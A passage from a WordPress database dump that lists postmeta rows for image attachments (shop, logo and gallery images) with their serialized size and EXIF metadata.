attachment_image_alt','j'),(51502,4298,'_wp_attached_file','2018/07/shop-img-11.jpg'),(51503,4298,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-11.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-11-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-11-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-11-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-11-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-11-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-11-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-11-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51504,4299,'_wp_attached_file','2018/08/shop-img-27.jpg'),(51505,4299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-27.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-27-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-27-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-27-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-27-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-27-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-27-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-27-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-27-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-27-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-27-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-27-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51506,4300,'_wp_attached_file','2018/08/signature-chef.png'),(51507,4300,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:218;s:6:\"height\";i:135;s:4:\"file\";s:26:\"2018/08/signature-chef.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"signature-chef-150x135.png\";s:5:\"width\";i:150;s:6:\"height\";i:135;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"signature-chef-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"signature-chef-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51508,4300,'_wp_attachment_image_alt','b'),(51509,206,'_wp_attached_file','2018/07/h1-img-9a.jpg'),(51510,206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:274;s:4:\"file\";s:21:\"2018/07/h1-img-9a.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h1-img-9a-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-9a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h1-img-9a-300x274.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-9a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h1-img-9a-300x274.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h1-img-9a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51511,206,'_wp_attachment_image_alt','m'),(51512,4298,'_wp_attachment_image_alt','x'),(51513,4299,'_wp_attachment_image_alt','d'),(51514,4301,'_wp_attached_file','2018/08/logo.png'),(51515,4301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:114;s:6:\"height\";i:114;s:4:\"file\";s:16:\"2018/08/logo.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:16:\"logo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"logo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51516,4301,'_wp_attachment_image_alt','m'),(51517,4302,'_wp_attached_file','2018/08/shop-img-28.jpg'),(51518,4302,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-28.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-28-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-28-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-28-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-28-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-28-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-28-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-28-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-28-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-28-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-28-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-28-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51519,4303,'_wp_attached_file','2018/08/accolades-left-img.png'),(51520,4303,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:563;s:6:\"height\";i:243;s:4:\"file\";s:30:\"2018/08/accolades-left-img.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"accolades-left-img-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"accolades-left-img-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"accolades-left-img-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"accolades-left-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"accolades-left-img-300x243.png\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"accolades-left-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51521,4303,'_wp_attachment_image_alt','v'),(51522,4304,'_wp_attached_file','2018/08/kitchen-img-gallery-1.jpg'),(51523,4304,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:610;s:4:\"file\";s:33:\"2018/08/kitchen-img-gallery-1.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"kitchen-img-gallery-1-1024x480.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-768x360.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-650x610.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-650x610.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-600x282.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-600x282.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51524,4302,'_wp_attachment_image_alt','c'),(51525,4305,'_wp_attached_file','2018/08/h7-port-img-2.jpg'),(51526,4305,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-2.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-2-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-2-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-2-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-2-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-2-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51527,4304,'_wp_attachment_image_alt','c'),(51528,4304,'portfolio_single_masonry_image_size',''),(51529,4304,'image_gallery_masonry_image_size',''),(51530,522,'_wp_attached_file','2018/08/shop-img-29.jpg'),(51531,522,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-29.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-29-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-29-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-29-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-29-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-29-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-29-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-29-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-29-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-29-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-29-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-29-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51532,4306,'_wp_attached_file','2018/08/logo-light.png'),(51533,4306,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:114;s:6:\"height\";i:114;s:4:\"file\";s:22:\"2018/08/logo-light.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"logo-light-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"logo-light-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51534,4306,'_wp_attachment_image_alt','m'),(51535,4307,'_wp_attached_file','2018/08/h6-img-5a.jpg'),(51536,4307,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-5a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-5a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-5a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-t